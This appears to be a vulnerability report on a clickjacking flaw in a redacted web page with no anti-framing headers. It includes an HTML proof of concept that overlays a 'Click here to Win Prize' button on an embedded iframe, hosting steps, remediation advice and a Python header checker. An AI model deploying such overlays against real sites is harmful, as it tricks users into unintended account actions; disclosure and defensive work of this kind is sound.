- Endpoint: REDACTED
- Date: 18 September 2024
- Type: ClickJacking
- Severity: Medium
- Impact: Attackers can create an invisible iframe overlay of the affected page, tricking users into clicking buttons or links that perform actions on their behalf. This could result in unauthorized actions, data exposure, or account compromises.
The webpage at REDACTED is vulnerable to a ClickJacking attack. ClickJacking is a technique that tricks users into clicking something different from what they perceive, potentially leading to unintended actions such as account hijacking or the execution of malicious tasks.
- The page does not send an HTTP security header that prevents ClickJacking, such as `X-Frame-Options` or a `Content-Security-Policy` header with the `frame-ancestors` directive, either of which would block it from being embedded in iframes.
- Create an HTML page that embeds REDACTED using an `<iframe>` tag:

  ```html
  <!DOCTYPE html>
  <html>
  <head>
    <title>Clickjacking PoC</title>
    <style>
      iframe {
        opacity: 0.9;
        position: absolute;
        top: 50px;
        left: 50px;
        width: 60%;
        height: 100%;
        z-index: 99;
      }
      input[type="button"] {
        position: absolute;
        top: 233px;        /* Adjust to place on top of the iframe */
        left: 180px;       /* Adjust to place on top of the iframe */
        z-index: 100;      /* This will keep the button above the iframe */
        font-size: 20px;
        padding: 10px 200px;
      }
    </style>
  </head>
  <body>
    <input type="button" value="Click here to Win Prize">
    <iframe src="REDACTED"></iframe>
  </body>
  </html>
  ```

- Host the HTML page on a separate domain.
- Open the hosted HTML file and observe how the victim page is embedded.
- Click the button, and the click event will be transferred to the underlying iframe, causing an unintended action on the victim's site.
- Implement the `X-Frame-Options` header with the value `DENY` or `SAMEORIGIN` to prevent the page from being embedded in iframes.
- Alternatively, implement a `Content-Security-Policy` header with the `frame-ancestors` directive set to `'self'` to restrict which domains can embed the page.
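To verify the fix (or to triage findings like this one at scale), the response headers can be evaluated the way a browser would. The following is an added example, not part of the original report: it takes a response header map (here constructed inline rather than fetched) and decides whether framing is blocked, giving `frame-ancestors` precedence over `X-Frame-Options` as CSP Level 2 browsers do.

```python
"""Evaluate anti-framing headers from an HTTP response (added example)."""
from typing import Mapping, Optional


def framing_policy(headers: Mapping[str, str]) -> dict:
    """Return {'protected': bool, 'source': str|None, 'detail': str}.

    Header names are matched case-insensitively. A single value per header
    is assumed (merge duplicate CSP headers before calling).
    """
    lower = {k.lower(): v.strip() for k, v in headers.items()}

    # Browsers that support CSP Level 2 ignore X-Frame-Options when a
    # frame-ancestors directive is present, so evaluate CSP first.
    csp = lower.get("content-security-policy", "")
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            sources = [s.lower() for s in parts[1:]]
            if sources == ["'none'"]:
                return {"protected": True, "source": "CSP",
                        "detail": "frame-ancestors 'none'"}
            if any(s in ("*", "http:", "https:") for s in sources):
                return {"protected": False, "source": "CSP",
                        "detail": "frame-ancestors allows any origin: " + " ".join(sources)}
            return {"protected": True, "source": "CSP",
                    "detail": "frame-ancestors restricted to " + " ".join(sources)}

    # Fall back to X-Frame-Options. Only DENY and SAMEORIGIN are reliable;
    # ALLOW-FROM is obsolete and ignored by current browsers, and any other
    # value is invalid, which leaves the page frameable.
    xfo = lower.get("x-frame-options", "").upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return {"protected": True, "source": "X-Frame-Options", "detail": xfo}
    if xfo:
        return {"protected": False, "source": "X-Frame-Options",
                "detail": f"unsupported value {xfo!r}"}
    return {"protected": False, "source": None,
            "detail": "no anti-framing header present"}


if __name__ == "__main__":
    # Constructed sample responses: the vulnerable state from the report,
    # and the two remediations it recommends.
    samples = {
        "before fix": {"Content-Type": "text/html"},
        "X-Frame-Options": {"X-Frame-Options": "SAMEORIGIN"},
        "CSP": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'self'"},
    }
    for name, hdrs in samples.items():
        print(f"{name:16s} -> {framing_policy(hdrs)}")
```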